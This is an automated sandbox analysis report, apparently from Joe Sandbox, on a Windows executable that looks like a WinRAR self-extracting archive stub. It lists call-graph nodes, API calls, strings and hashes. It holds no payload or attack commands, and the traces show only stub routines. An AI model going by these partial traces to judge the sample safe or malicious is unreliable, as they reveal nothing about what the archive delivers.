GdiplusStartup SHGetMalloc 25529->25530 25530->25368 25534 cad702 25531->25534 25532 cad818 25532->25377 25532->25378 25533 ca32f7 CharUpperW 25533->25534 25534->25532 25534->25533 25588 ca074b 83 API calls _wcslen 25534->25588 25537 caffc0 25536->25537 25538 caed2b SetEnvironmentVariableW 25537->25538 25540 caed4e 25538->25540 25539 caed76 25539->25371 25540->25539 25541 caed6a SetEnvironmentVariableW 25540->25541 25541->25539 25543 cac8eb GetObjectW 25542->25543 25544 cac8de 25542->25544 25546 cac8fa 25543->25546 25589 cab6c2 
FindResourceW 25544->25589 25548 cab5c6 4 API calls 25546->25548 25549 cac90d 25548->25549 25550 cac950 25549->25550 25551 cac92c 25549->25551 25553 cab6c2 13 API calls 25549->25553 25561 c9ed62 25550->25561 25605 cab605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25551->25605 25555 cac91d 25553->25555 25554 cac934 25606 cab5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25554->25606 25555->25551 25556 cac923 DeleteObject 25555->25556 25556->25551 25558 cac93d 25607 cab80c 9 API calls 25558->25607 25560 cac944 DeleteObject 25560->25550 25616 c9ed87 25561->25616 25566 caa0c7 25567 cafeae 27 API calls 25566->25567 25568 caa0e6 25567->25568 25568->25391 25570 cabda0 GdiplusShutdown CoUninitialize 25569->25570 25570->25410 25572->25394 25573->25396 25574->25402 25575->25408 25577 c9c669 25576->25577 25578 c9c62d GetVersionExW 25576->25578 25577->25494 25578->25577 25580 caffc0 25579->25580 25581 ca1b41 GetSystemDirectoryW 25580->25581 25582 ca1b59 25581->25582 25583 ca1b77 25581->25583 25584 ca1b6a LoadLibraryW 25582->25584 25583->25494 25584->25583 25585->25488 25587 cb4f9b 25586->25587 25587->25519 25587->25587 25588->25534 25590 cab7d3 25589->25590 25591 cab6e5 SizeofResource 25589->25591 25590->25543 25590->25546 25591->25590 25592 cab6fc LoadResource 25591->25592 25592->25590 25593 cab711 LockResource 25592->25593 25593->25590 25594 cab722 GlobalAlloc 25593->25594 25594->25590 25595 cab73d GlobalLock 25594->25595 25596 cab7cc GlobalFree 25595->25596 25597 cab74c __InternalCxxFrameHandler 25595->25597 25596->25590 25598 cab754 CreateStreamOnHGlobal 25597->25598 25599 cab76c 25598->25599 25600 cab7c5 GlobalUnlock 25598->25600 25608 cab626 GdipAlloc 25599->25608 25600->25596 25603 cab79a GdipCreateHBITMAPFromBitmap 25604 cab7b0 25603->25604 25604->25600 25605->25554 25606->25558 25607->25560 25609 cab638 25608->25609 25610 cab645 25608->25610 25612 cab3b8 25609->25612 25610->25600 25610->25603 25610->25604 25613 cab3d9 GdipCreateBitmapFromStreamICM 25612->25613 25614 
cab3e0 GdipCreateBitmapFromStream 25612->25614 25615 cab3e5 25613->25615 25614->25615 25615->25610 25617 c9ed95 __EH_prolog 25616->25617 25618 c9edc4 GetModuleFileNameW 25617->25618 25619 c9edf5 25617->25619 25620 c9edde 25618->25620 25662 c9ab40 25619->25662 25620->25619 25622 c9ee51 25673 cb7720 25622->25673 25623 c9a801 81 API calls 25624 c9ed6e 25623->25624 25660 c9f5be GetModuleHandleW FindResourceW 25624->25660 25626 c9ee25 25626->25622 25628 c9f581 79 API calls 25626->25628 25641 c9f06a 25626->25641 25627 c9ee64 25629 cb7720 26 API calls 25627->25629 25628->25626 25637 c9ee76 ___vcrt_FlsSetValue 25629->25637 25630 c9efa5 25630->25641 25693 c9b000 82 API calls 25630->25693 25632 c9b110 80 API calls 25632->25637 25634 c9efbf ___std_exception_copy 25635 c9ae60 83 API calls 25634->25635 25634->25641 25638 c9efe8 ___std_exception_copy 25635->25638 25637->25630 25637->25632 25637->25641 25687 c9ae60 25637->25687 25692 c9b000 82 API calls 25637->25692 25640 c9eff3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 25638->25640 25638->25641 25694 ca2ec2 MultiByteToWideChar 25638->25694 25640->25641 25643 c9f479 25640->25643 25656 ca30e5 WideCharToMultiByte 25640->25656 25695 c9f8d1 50 API calls __vsnprintf 25640->25695 25696 cb7561 26 API calls 3 library calls 25640->25696 25697 cba08e 26 API calls 2 library calls 25640->25697 25698 cb8a08 26 API calls 2 library calls 25640->25698 25699 c9f59c 79 API calls 25640->25699 25641->25623 25652 c9f4fe 25643->25652 25700 cba08e 26 API calls 2 library calls 25643->25700 25645 c9f48e 25701 cb8a08 26 API calls 2 library calls 25645->25701 25647 c9f4e6 25702 c9f59c 79 API calls 25647->25702 25648 c9f534 25649 cb7720 26 API calls 25648->25649 25651 c9f54d 25649->25651 25654 cb7720 26 API calls 25651->25654 25652->25648 25653 c9f581 79 API calls 25652->25653 25653->25652 25654->25641 25656->25640 25661 c9ed75 25660->25661 25661->25566 25663 c9ab4a 25662->25663 25664 c9abab CreateFileW 25663->25664 25665 c9abcc GetLastError 
25664->25665 25668 c9ac1b 25664->25668 25666 c9cf32 GetCurrentDirectoryW 25665->25666 25667 c9abec 25666->25667 25667->25668 25670 c9abf0 CreateFileW GetLastError 25667->25670 25669 c9ac5f 25668->25669 25672 c9ac45 SetFileTime 25668->25672 25669->25626 25670->25668 25671 c9ac15 25670->25671 25671->25668 25672->25669 25674 cb7759 25673->25674 25675 cb775d 25674->25675 25686 cb7785 25674->25686 25703 cba7db 20 API calls __dosmaperr 25675->25703 25677 cb7762 25704 cb51a9 26 API calls ___std_exception_copy 25677->25704 25678 cb7aa9 25680 cb0d6c CatchGuardHandler 5 API calls 25678->25680 25682 cb7ab6 25680->25682 25681 cb776d 25683 cb0d6c CatchGuardHandler 5 API calls 25681->25683 25682->25627 25685 cb7779 25683->25685 25685->25627 25686->25678 25705 cb7640 5 API calls CatchGuardHandler 25686->25705 25688 c9ae6c 25687->25688 25690 c9ae73 25687->25690 25688->25637 25690->25688 25691 c9a9e5 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25690->25691 25706 c977bd 78 API calls 25690->25706 25691->25690 25692->25637 25693->25634 25694->25640 25695->25640 25696->25640 25697->25640 25698->25640 25699->25640 25700->25645 25701->25647 25702->25652 25703->25677 25704->25681 25705->25686 25706->25690 25708 cb9093 _abort 25707->25708 25709 cb909a 25708->25709 25710 cb90ac 25708->25710 25743 cb91e1 GetModuleHandleW 25709->25743 25731 cbbde1 EnterCriticalSection 25710->25731 25713 cb909f 25713->25710 25744 cb9225 GetModuleHandleExW 25713->25744 25714 cb9151 25732 cb9191 25714->25732 25718 cb9128 25723 cb9140 25718->25723 25724 cb9e51 _abort 5 API calls 25718->25724 25720 cb90b3 25720->25714 25720->25718 25752 cb9ba0 20 API calls _abort 25720->25752 25721 cb919a 25753 cc3540 5 API calls CatchGuardHandler 25721->25753 25722 cb916e 25735 cb91a0 25722->25735 25725 cb9e51 _abort 5 API calls 25723->25725 25724->25723 25725->25714 25731->25720 25754 cbbe31 LeaveCriticalSection 25732->25754 25734 cb916a 25734->25721 25734->25722 25755 cbc226 25735->25755 25738 cb91ce 25741 
cb9225 _abort 8 API calls 25738->25741 25739 cb91ae GetPEB 25739->25738 25740 cb91be GetCurrentProcess TerminateProcess 25739->25740 25740->25738 25742 cb91d6 ExitProcess 25741->25742 25743->25713 25745 cb924f GetProcAddress 25744->25745 25746 cb9272 25744->25746 25749 cb9264 25745->25749 25747 cb9278 FreeLibrary 25746->25747 25748 cb9281 25746->25748 25747->25748 25750 cb0d6c CatchGuardHandler 5 API calls 25748->25750 25749->25746 25751 cb90ab 25750->25751 25751->25710 25752->25718 25754->25734 25756 cbc24b 25755->25756 25760 cbc241 25755->25760 25761 cbbe48 25756->25761 25758 cb0d6c CatchGuardHandler 5 API calls 25759 cb91aa 25758->25759 25759->25738 25759->25739 25760->25758 25762 cbbe78 25761->25762 25765 cbbe74 25761->25765 25762->25760 25763 cbbe98 25763->25762 25766 cbbea4 GetProcAddress 25763->25766 25765->25762 25765->25763 25768 cbbee4 25765->25768 25767 cbbeb4 __dosmaperr 25766->25767 25767->25762 25769 cbbf05 LoadLibraryExW 25768->25769 25773 cbbefa 25768->25773 25770 cbbf3a 25769->25770 25771 cbbf22 GetLastError 25769->25771 25770->25773 25774 cbbf51 FreeLibrary 25770->25774 25771->25770 25772 cbbf2d LoadLibraryExW 25771->25772 25772->25770 25773->25765 25774->25773 26068 c91800 87 API calls Concurrency::cancel_current_task 26069 cab400 GdipDisposeImage GdipFree 26135 cac306 GetDlgItem EnableWindow ShowWindow SendMessageW 25791 cb961a 25802 cbcce0 25791->25802 25796 cb9637 25798 cba65a _free 20 API calls 25796->25798 25799 cb966c 25798->25799 25800 cb9642 25801 cba65a _free 20 API calls 25800->25801 25801->25796 25803 cb962c 25802->25803 25804 cbcce9 25802->25804 25806 cbd0e0 GetEnvironmentStringsW 25803->25806 25819 cbcbd7 25804->25819 25807 cbd0f7 25806->25807 25817 cbd14a 25806->25817 25810 cbd0fd WideCharToMultiByte 25807->25810 25808 cb9631 25808->25796 25818 cb9672 26 API calls 4 library calls 25808->25818 25809 cbd153 FreeEnvironmentStringsW 25809->25808 25811 cbd119 25810->25811 25810->25817 25812 cba7ee __vswprintf_c_l 21 API calls 
25811->25812 25813 cbd11f 25812->25813 25814 cbd13c 25813->25814 25815 cbd126 WideCharToMultiByte 25813->25815 25816 cba65a _free 20 API calls 25814->25816 25815->25814 25816->25817 25817->25808 25817->25809 25818->25800 25820 cba505 _abort 38 API calls 25819->25820 25821 cbcbe4 25820->25821 25839 cbccfe 25821->25839 25823 cbcbec 25848 cbc96b 25823->25848 25826 cbcc03 25826->25803 25827 cba7ee __vswprintf_c_l 21 API calls 25828 cbcc14 25827->25828 25829 cbcc46 25828->25829 25855 cbcda0 25828->25855 25832 cba65a _free 20 API calls 25829->25832 25832->25826 25833 cbcc41 25865 cba7db 20 API calls __dosmaperr 25833->25865 25835 cbcc8a 25835->25829 25866 cbc841 26 API calls 25835->25866 25836 cbcc5e 25836->25835 25837 cba65a _free 20 API calls 25836->25837 25837->25835 25840 cbcd0a ___scrt_is_nonwritable_in_current_image 25839->25840 25841 cba505 _abort 38 API calls 25840->25841 25846 cbcd14 25841->25846 25844 cbcd98 _abort 25844->25823 25846->25844 25847 cba65a _free 20 API calls 25846->25847 25867 cba0e4 38 API calls _abort 25846->25867 25868 cbbde1 EnterCriticalSection 25846->25868 25869 cbcd8f LeaveCriticalSection _abort 25846->25869 25847->25846 25849 cb5934 __fassign 38 API calls 25848->25849 25850 cbc97d 25849->25850 25851 cbc99e 25850->25851 25852 cbc98c GetOEMCP 25850->25852 25853 cbc9b5 25851->25853 25854 cbc9a3 GetACP 25851->25854 25852->25853 25853->25826 25853->25827 25854->25853 25856 cbc96b 40 API calls 25855->25856 25857 cbcdbf 25856->25857 25859 cbce10 IsValidCodePage 25857->25859 25862 cbcdc6 25857->25862 25864 cbce35 __cftof 25857->25864 25858 cb0d6c CatchGuardHandler 5 API calls 25860 cbcc39 25858->25860 25861 cbce22 GetCPInfo 25859->25861 25859->25862 25860->25833 25860->25836 25861->25862 25861->25864 25862->25858 25870 cbca43 GetCPInfo 25864->25870 25865->25829 25866->25829 25868->25846 25869->25846 25875 cbca7d 25870->25875 25879 cbcb27 25870->25879 25873 cb0d6c CatchGuardHandler 5 API calls 25874 cbcbd3 25873->25874 25874->25862 25880 cbdb38 
25875->25880 25878 cbbd28 __vswprintf_c_l 43 API calls 25878->25879 25879->25873 25881 cb5934 __fassign 38 API calls 25880->25881 25882 cbdb58 MultiByteToWideChar 25881->25882 25884 cbdc2e 25882->25884 25885 cbdb96 25882->25885 25886 cb0d6c CatchGuardHandler 5 API calls 25884->25886 25888 cba7ee __vswprintf_c_l 21 API calls 25885->25888 25891 cbdbb7 __cftof __vsnwprintf_l 25885->25891 25889 cbcade 25886->25889 25887 cbdc28 25899 cbbd73 20 API calls _free 25887->25899 25888->25891 25894 cbbd28 25889->25894 25891->25887 25892 cbdbfc MultiByteToWideChar 25891->25892 25892->25887 25893 cbdc18 GetStringTypeW 25892->25893 25893->25887 25895 cb5934 __fassign 38 API calls 25894->25895 25896 cbbd3b 25895->25896 25900 cbbb0b 25896->25900 25899->25884 25901 cbbb26 __vswprintf_c_l 25900->25901 25902 cbbb4c MultiByteToWideChar 25901->25902 25903 cbbd00 25902->25903 25904 cbbb76 25902->25904 25905 cb0d6c CatchGuardHandler 5 API calls 25903->25905 25907 cba7ee __vswprintf_c_l 21 API calls 25904->25907 25910 cbbb97 __vsnwprintf_l 25904->25910 25906 cbbd13 25905->25906 25906->25878 25907->25910 25908 cbbc4c 25936 cbbd73 20 API calls _free 25908->25936 25909 cbbbe0 MultiByteToWideChar 25909->25908 25911 cbbbf9 25909->25911 25910->25908 25910->25909 25927 cbc11c 25911->25927 25915 cbbc5b 25919 cba7ee __vswprintf_c_l 21 API calls 25915->25919 25922 cbbc7c __vsnwprintf_l 25915->25922 25916 cbbc23 25916->25908 25918 cbc11c __vswprintf_c_l 11 API calls 25916->25918 25917 cbbcf1 25935 cbbd73 20 API calls _free 25917->25935 25918->25908 25919->25922 25920 cbc11c __vswprintf_c_l 11 API calls 25923 cbbcd0 25920->25923 25922->25917 25922->25920 25923->25917 25924 cbbcdf WideCharToMultiByte 25923->25924 25924->25917 25925 cbbd1f 25924->25925 25937 cbbd73 20 API calls _free 25925->25937 25928 cbbe48 __dosmaperr 5 API calls 25927->25928 25929 cbc143 25928->25929 25932 cbc14c 25929->25932 25938 cbc1a4 10 API calls 3 library calls 25929->25938 25931 cbc18c LCMapStringW 25931->25932 25933 cb0d6c 
CatchGuardHandler 5 API calls 25932->25933 25934 cbbc10 25933->25934 25934->25908 25934->25915 25934->25916 25935->25908 25936->25903 25937->25908 25938->25931 25939 caf31b 14 API calls ___delayLoadHelper2@8 26070 ca741e 138 API calls __InternalCxxFrameHandler 25941 caf41c 25942 caf325 25941->25942 25943 caf9d9 ___delayLoadHelper2@8 14 API calls 25942->25943 25943->25942 26071 cad410 92 API calls _swprintf 25947 cba610 25955 cbbf5f 25947->25955 25951 cba62c 25952 cba639 25951->25952 25963 cba640 11 API calls 25951->25963 25954 cba624 25956 cbbe48 __dosmaperr 5 API calls 25955->25956 25957 cbbf86 25956->25957 25958 cbbf9e TlsAlloc 25957->25958 25959 cbbf8f 25957->25959 25958->25959 25960 cb0d6c CatchGuardHandler 5 API calls 25959->25960 25961 cba61a 25960->25961 25961->25954 25962 cba589 20 API calls 2 library calls 25961->25962 25962->25951 25963->25954 25970 c9ca2e 25971 c9ca40 __cftof 25970->25971 25974 ca23f4 25971->25974 25977 ca23b6 GetCurrentProcess GetProcessAffinityMask 25974->25977 25978 c9ca97 25977->25978 26137 cb0723 20 API calls 26138 cb9320 52 API calls 3 library calls 26072 c91025 29 API calls 26000 c9213d 26001 c92148 26000->26001 26004 c92150 26000->26004 26006 c92162 27 API calls Concurrency::cancel_current_task 26001->26006 26003 c9214e 26004->26003 26005 cafeae 27 API calls 26004->26005 26005->26003 26006->26003 26073 c92430 26 API calls std::bad_exception::bad_exception 26008 caa530 26009 caa555 26008->26009 26010 caa53b 26008->26010 26010->26009 26012 cab181 26010->26012 26013 cab18a 26012->26013 26014 cab198 26012->26014 26013->26014 26016 caa6c1 26013->26016 26014->26009 26017 caa7f6 26016->26017 26018 caa6d0 _wcslen ___std_exception_copy 26016->26018 26017->26014 26018->26017 26027 ca3328 CompareStringW _wcslen 26018->26027 26020 caa749 _wcslen 26021 caa78b GlobalAlloc 26020->26021 26022 caa7c0 26021->26022 26023 caa7a1 WideCharToMultiByte 26021->26023 26024 caa7d4 CreateStreamOnHGlobal 26022->26024 26023->26022 26024->26017 26025 caa7e8 
26024->26025 26028 caa59b 26025->26028 26027->26020 26030 caa5c4 26028->26030 26029 caa6b0 26029->26017 26030->26029 26036 caad0e CompareStringW _wcslen ___std_exception_copy 26030->26036 26032 caa67a 26032->26029 26033 caa680 ShowWindow SetWindowTextW 26032->26033 26035 caa6af 26033->26035 26035->26029 26036->26032 26101 cb0530 46 API calls __RTC_Initialize 26140 cb0737 29 API calls _abort 26074 c92037 143 API calls __EH_prolog 26102 ca0534 FreeLibrary

    Control-flow Graph

    APIs
      • Part of subcall function 00CA1B7C: GetModuleHandleW.KERNEL32(kernel32), ref: 00CA1B95
      • Part of subcall function 00CA1B7C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CA1BA7
      • Part of subcall function 00CA1B7C: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CA1BD8
      • Part of subcall function 00CAB64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00CAB655
      • Part of subcall function 00CABD0B: OleInitialize.OLE32(00000000), ref: 00CABD24
      • Part of subcall function 00CABD0B: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CABD5B
      • Part of subcall function 00CABD0B: SHGetMalloc.SHELL32(00CDA460), ref: 00CABD65
    • GetCommandLineW.KERNEL32 ref: 00CAF08B
    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00CAF0B5
    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 00CAF0C6
    • UnmapViewOfFile.KERNEL32(00000000), ref: 00CAF117
      • Part of subcall function 00CAED1E: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00CAED34
      • Part of subcall function 00CAED1E: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CAED70
      • Part of subcall function 00CA074B: _wcslen.LIBCMT ref: 00CA076F
    • CloseHandle.KERNEL32(00000000), ref: 00CAF11E
    • GetModuleFileNameW.KERNEL32(00000000,00CF0CC0,00000800), ref: 00CAF138
    • SetEnvironmentVariableW.KERNEL32(sfxname,00CF0CC0), ref: 00CAF144
    • GetLocalTime.KERNEL32(?), ref: 00CAF14F
    • _swprintf.LIBCMT ref: 00CAF18E
    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00CAF1A3
    • GetModuleHandleW.KERNEL32(00000000), ref: 00CAF1AA
    • LoadIconW.USER32(00000000,00000064), ref: 00CAF1C1
    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001C9C0,00000000), ref: 00CAF212
    • Sleep.KERNEL32(?), ref: 00CAF240
    • DeleteObject.GDI32 ref: 00CAF279
    • DeleteObject.GDI32(?), ref: 00CAF289
    • CloseHandle.KERNEL32 ref: 00CAF2CC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
    • API String ID: 3014515783-3710569615
    • Opcode ID: 1fb8ef017e2658ffbbd8d889292e6afc4f8ec70d15961d6cc2ca50a2723c4ddd
    • Instruction ID: 0d184294cebcc5fe668cff85ebcb2f55f3072a9a5a77d35c6a791bf19f320373
    • Opcode Fuzzy Hash: 1fb8ef017e2658ffbbd8d889292e6afc4f8ec70d15961d6cc2ca50a2723c4ddd
    • Instruction Fuzzy Hash: 0A612C71500341ABD710ABB5DC49FBF3BACEB46748F08042EFA45D22A2DB749D44DB62

    Control-flow Graph (text export: each node is a basic-block address range followed by the APIs it calls, `a->b` is an edge; the executed / not-executed colouring of the rendered graph is not preserved)
    control_flow_graph 701 cab6c2-cab6df FindResourceW 702 cab7db 701->702 703 cab6e5-cab6f6 SizeofResource 701->703 704 cab7dd-cab7e1 702->704 703->702 705 cab6fc-cab70b LoadResource 703->705 705->702 706 cab711-cab71c LockResource 705->706 706->702 707 cab722-cab737 GlobalAlloc 706->707 708 cab73d-cab746 GlobalLock 707->708 709 cab7d3-cab7d9 707->709 710 cab7cc-cab7cd GlobalFree 708->710 711 cab74c-cab76a call cb2db0 CreateStreamOnHGlobal 708->711 709->704 710->709 714 cab76c-cab78e call cab626 711->714 715 cab7c5-cab7c6 GlobalUnlock 711->715 714->715 720 cab790-cab798 714->720 715->710 721 cab79a-cab7ae GdipCreateHBITMAPFromBitmap 720->721 722 cab7b3-cab7c1 720->722 721->722 723 cab7b0 721->723 722->715 723->722
    APIs
    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CAC91D,00000066), ref: 00CAB6D5
    • SizeofResource.KERNEL32(00000000,?,?,?,00CAC91D,00000066), ref: 00CAB6EC
    • LoadResource.KERNEL32(00000000,?,?,?,00CAC91D,00000066), ref: 00CAB703
    • LockResource.KERNEL32(00000000,?,?,?,00CAC91D,00000066), ref: 00CAB712
    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,00CAC91D,00000066), ref: 00CAB72D
    • GlobalLock.KERNEL32(00000000), ref: 00CAB73E
    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00CAB762
    • GlobalUnlock.KERNEL32(00000000), ref: 00CAB7C6
      • Part of subcall function 00CAB626: GdipAlloc.GDIPLUS(00000010), ref: 00CAB62C
    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CAB7A7
    • GlobalFree.KERNEL32(00000000), ref: 00CAB7CD
    Memory Dump Source and Joe Sandbox IDA Plugin snapshot: identical to the entry above (source file 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, offset 00C90000; snapshot hcaresult_0_2_c90000_oJK2UKac7G.jbxd).
    Similarity
    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
    • String ID: PNG
    • API String ID: 211097158-364855578
    • Opcode ID: 3da3f1b17cc9bfba8ee37f8e51d3818b4aa25b327d6e99a71524c2d9e7d5c060
    • Instruction ID: fd2f02a1386fce843c2342a1b194892de188a13c1c74f6cd0df60830ada86955
    • Opcode Fuzzy Hash: 3da3f1b17cc9bfba8ee37f8e51d3818b4aa25b327d6e99a71524c2d9e7d5c060
    • Instruction Fuzzy Hash: 3A31AD71600702AFD7119F21EC98F2F7BA8EF86795B054929F955C2221EB71ED40CBA1

    Control-flow Graph (text export: each node is a basic-block address range followed by the APIs it calls, `a->b` is an edge; the executed / not-executed colouring of the rendered graph is not preserved)
    control_flow_graph 822 c9ba94-c9bab8 call caffc0 825 c9baba-c9bac7 FindFirstFileW 822->825 826 c9bb20-c9bb29 FindNextFileW 822->826 827 c9bb3b-c9bbf8 call ca1928 call c9d71d call ca2914 * 3 825->827 829 c9bac9-c9badb call c9cf32 825->829 826->827 828 c9bb2b-c9bb39 GetLastError 826->828 833 c9bbfd-c9bc0a 827->833 830 c9bb12-c9bb1b 828->830 837 c9badd-c9baf5 FindFirstFileW 829->837 838 c9baf7-c9bb00 GetLastError 829->838 830->833 837->827 837->838 840 c9bb10 838->840 841 c9bb02-c9bb05 838->841 840->830 841->840 843 c9bb07-c9bb0a 841->843 843->840 845 c9bb0c-c9bb0e 843->845 845->830
    APIs
    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,00C9B98B,000000FF,?,?), ref: 00C9BABD
      • Part of subcall function 00C9CF32: _wcslen.LIBCMT ref: 00C9CF56
    • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00C9B98B,000000FF,?,?), ref: 00C9BAEB
    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00C9B98B,000000FF,?,?), ref: 00C9BAF7
    • FindNextFileW.KERNEL32(?,?,?,?,?,?,00C9B98B,000000FF,?,?), ref: 00C9BB21
    • GetLastError.KERNEL32(?,?,?,?,00C9B98B,000000FF,?,?), ref: 00C9BB2D
    Memory Dump Source and Joe Sandbox IDA Plugin snapshot: identical to the entry above (source file 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, offset 00C90000; snapshot hcaresult_0_2_c90000_oJK2UKac7G.jbxd).
    Similarity
    • API ID: FileFind$ErrorFirstLast$Next_wcslen
    • String ID:
    • API String ID: 42610566-0
    • Opcode ID: 1d1340db3ae845a8c06968258ad4e0715aac99677d7813e54f06861089ded004
    • Instruction ID: d13cec1523b7ac8ca65178356421367e655939d128c75d112e86b2eca981dcf0
    • Opcode Fuzzy Hash: 1d1340db3ae845a8c06968258ad4e0715aac99677d7813e54f06861089ded004
    • Instruction Fuzzy Hash: 27415C72901519ABCB25DF64DC98BEAB3B8FB48350F104196E96DE3240D734AF949F90
    APIs
    • __EH_prolog.LIBCMT ref: 00C992CB
      • Part of subcall function 00C9D656: _wcsrchr.LIBVCRUNTIME ref: 00C9D660
      • Part of subcall function 00C9CAA0: _wcslen.LIBCMT ref: 00C9CAA6
      • Part of subcall function 00CA1900: _wcslen.LIBCMT ref: 00CA1906
      • Part of subcall function 00C9B5D6: _wcslen.LIBCMT ref: 00C9B5E2
      • Part of subcall function 00C9B5D6: __aulldiv.LIBCMT ref: 00C9B60E
      • Part of subcall function 00C9B5D6: GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 00C9B615
      • Part of subcall function 00C9B5D6: _swprintf.LIBCMT ref: 00C9B640
      • Part of subcall function 00C9B5D6: _wcslen.LIBCMT ref: 00C9B64A
      • Part of subcall function 00C9B5D6: _swprintf.LIBCMT ref: 00C9B6A0
      • Part of subcall function 00C9B5D6: _wcslen.LIBCMT ref: 00C9B6AA
      • Part of subcall function 00C94727: __EH_prolog.LIBCMT ref: 00C9472C
      • Part of subcall function 00C9A212: __EH_prolog.LIBCMT ref: 00C9A217
      • Part of subcall function 00C9B8E6: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,00C9B5B5,?,?,?,00C9B405,?,00000001,00000000,?,?), ref: 00C9B8FA
      • Part of subcall function 00C9B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00C9B5B5,?,?,?,00C9B405,?,00000001,00000000,?,?), ref: 00C9B92B
    Strings
    • __tmp_reference_source_, xrefs: 00C99596
    Memory Dump Source and Joe Sandbox IDA Plugin snapshot: identical to the entry above (source file 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, offset 00C90000; snapshot hcaresult_0_2_c90000_oJK2UKac7G.jbxd).
    Similarity
    • API ID: _wcslen$H_prolog$AttributesFile_swprintf$CurrentProcess__aulldiv_wcsrchr
    • String ID: __tmp_reference_source_
    • API String ID: 70197177-685763994
    • Opcode ID: 872c6bdef0b982b8539d4cb52c98634374be9ad41e6040df55bb08a4b4d647ac
    • Instruction ID: b575a4bb60dad51e72d7c58c3896af8d4ec9b6d759d5087751f5a431f0a86763
    • Opcode Fuzzy Hash: 872c6bdef0b982b8539d4cb52c98634374be9ad41e6040df55bb08a4b4d647ac
    • Instruction Fuzzy Hash: 17A2F971904245AEDF15DF68C89DBEDBBB8FF05300F0841BDE9599B182DB309A48DBA1
    APIs
    • GetCurrentProcess.KERNEL32(00000000,?,00CB9176,00000000,00CCD570,0000000C,00CB92CD,00000000,00000002,00000000), ref: 00CB91C1
    • TerminateProcess.KERNEL32(00000000,?,00CB9176,00000000,00CCD570,0000000C,00CB92CD,00000000,00000002,00000000), ref: 00CB91C8
    • ExitProcess.KERNEL32 ref: 00CB91DA
    Memory Dump Source and Joe Sandbox IDA Plugin snapshot: identical to the entry above (source file 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, offset 00C90000; snapshot hcaresult_0_2_c90000_oJK2UKac7G.jbxd).
    Similarity
    • API ID: Process$CurrentExitTerminate
    • String ID:
    • API String ID: 1703294689-0
    • Opcode ID: 6c8850bfba9347372e3e0e956877e95a0e70e612ba65f0f816a43da45af5e0b3
    • Instruction ID: 5a641e2a65acaf5f51e5698c8e290386dda84954e2d19d003278df61518f947a
    • Opcode Fuzzy Hash: 6c8850bfba9347372e3e0e956877e95a0e70e612ba65f0f816a43da45af5e0b3
    • Instruction Fuzzy Hash: B6E0B636004508ABCF15AF64DD1DF9C3F7AEB50341F018414FA099A121CB35DE92EB51
    APIs
    • CLSIDFromString.COMBASE(?,?), ref: 00CAB0CF
    • CoCreateInstance.COMBASE(?,00000000,00000005,00CC64FC,?), ref: 00CAB0E6
    Memory Dump Source and Joe Sandbox IDA Plugin snapshot: identical to the entry above (source file 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, offset 00C90000; snapshot hcaresult_0_2_c90000_oJK2UKac7G.jbxd).
    Similarity
    • API ID: CreateFromInstanceString
    • String ID:
    • API String ID: 432265043-0
    • Opcode ID: 8e6d41e37c3d2c9c98cb77a57ec9860436f4ed892d6e273e3cf50136b14bb988
    • Instruction ID: 36fe804908a98d499bc6aee2fcb4c1b032de2fca784eba18de1b0a63b628a45e
